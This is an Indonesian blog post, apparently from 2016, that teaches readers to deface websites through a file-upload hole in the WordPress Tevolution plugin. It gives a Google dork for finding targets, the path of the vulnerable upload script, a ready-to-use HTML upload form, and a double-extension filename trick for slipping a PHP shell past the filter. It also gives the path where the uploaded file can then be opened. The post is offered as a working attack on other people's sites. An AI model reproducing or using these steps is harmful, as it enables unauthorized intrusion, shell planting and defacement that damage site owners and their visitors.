Kamis, 29 Desember 2016

Deface Teknik WordPress Plugins Tevolution


Google Dork : Index of /wp-content/plugins/Tevolution/

Exploit : https://websites/wordpress
   /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Bypass Shell : files.php.xxxjpg

Gagal Bypass ? Upload Biasa Aja : files.txt

~ Step By Step ~

1. Cari Website Target, Bisa Menggunakan Dork Diatas, Kalau Bisa Kembangin Lagi Dorknya ^_^

2. Masukan Exploitnya Diakhiran Website Atau Setelah Website,

Jika Vuln, Tampilannya Akan BLANK Warna Putih.

3. Setelah Berhasil Menemukan Yang Vuln, Silahkan Buat File CSRF.html

<form action="https://website/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>


Edit Tanda Merah (Url) Itu, Lalu Simpan Filenya Dengan Ext.HTML

4. Lalu Buka File CSRF Tersebut Dan Upload "files.php.xxxjpg" Atau "files.txt"
 Jika Berhasil, Muncul Kode Random (Nama File Random)



5. Dan Untuk Melihat Hasilnya Bisa Ditambahkan Url Seperti Ini.

https://WordPress/wp-content/themes/Directory/images/tmp/random-files.ext

Terima Kasih,

0 komentar

Posting Komentar